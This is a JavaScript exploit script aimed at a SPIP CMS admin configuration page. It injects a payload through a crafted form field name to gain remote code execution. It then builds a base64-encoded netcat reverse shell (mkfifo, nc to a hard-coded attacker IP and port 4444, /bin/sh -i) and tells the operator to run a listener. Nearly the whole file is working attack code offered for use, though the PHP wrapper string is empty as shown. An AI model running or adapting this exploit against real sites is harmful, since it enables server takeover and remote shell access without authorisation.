// --- Configuration ---
// IMPORTANT: Replace these values with your own IP and port.
const ATTACKER_IP = '161.97.146.1'; // e.g., '192.168.1.10'
const ATTACKER_PORT = '4444';     // e.g., '4444'
// ---------------------

async function implant_rce(payload) {
    // This function remains the same. It injects the payload.
    const url = '/ecrire/?exec=configurer_mediabox';
    try {
        const htmlContent = await (await fetch(url)).text();
        const parser = new DOMParser();
        const doc = parser.parseFromString(htmlContent, 'text/html');
        const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
        const formData = new FormData(form);
        formData.append(`lity[BEFORE${payload}AFTER]`, 42);
        
        const submitResponse = await fetch(form.action, {
            method: 'POST',
            body: formData,
        });
    } catch (error) {
        console.error("Error during implant:", error);
    }
}

async function trigger_rce() {
    // This function is no longer needed to get output for a reverse shell,
    // but we keep it to maintain the script's logic flow.
    const url = `/ecrire/?exec=configurer_mediabox`;
    const htmlContent = await (await fetch(url)).text();
    const regex = /BEFORE\s*([\s\S]*?)\s*AFTER/;
    const match = htmlContent.match(regex);
    // The result of a reverse shell is not captured here; it's an interactive session.
    // We can return a confirmation message instead.
    return match ? "Payload triggered." : "Payload not found in response.";
}

async function rce(cmd_payload) {
    // The core change is here. We now pass the full netcat payload.
    await implant_rce(cmd_payload);
    let result = await trigger_rce();
    return result;
}

async function get_reverse_shell() {
    // --- Step 1: Create the Netcat Payload ---
    // This payload uses `mkfifo` to create a named pipe, allowing for a stable, two-way connection.
    // It then uses `/bin/sh -i` to launch an interactive shell.
    // The command is base64 encoded to avoid issues with special characters.
    const netcat_command = `mkfifo /tmp/f; nc ${ATTACKER_IP} ${ATTACKER_PORT} 0</tmp/f | /bin/sh -i 2>&1 | tee /tmp/f`;
    const encoded_payload = btoa(netcat_command);
    const php_payload = ``;

    console.log("Attempting to establish reverse shell...");
    console.log(`Make sure you are listening on your machine with: nc -lvnp ${ATTACKER_PORT}`);

    // --- Step 2: Execute the Payload ---
    const result = await rce(php_payload);
    console.log("Payload sent. Result:", result);

    // --- Step 3: Clean Up (Optional but Recommended) ---
    // After you disconnect from the shell, you can run this to remove the backdoor.
    // You might want to call this separately after your session is over.
    // await implant_rce("whiped");
}

// --- Execute the function to get the shell ---
// Make sure to set your IP and port in the configuration above before running!
get_reverse_shell();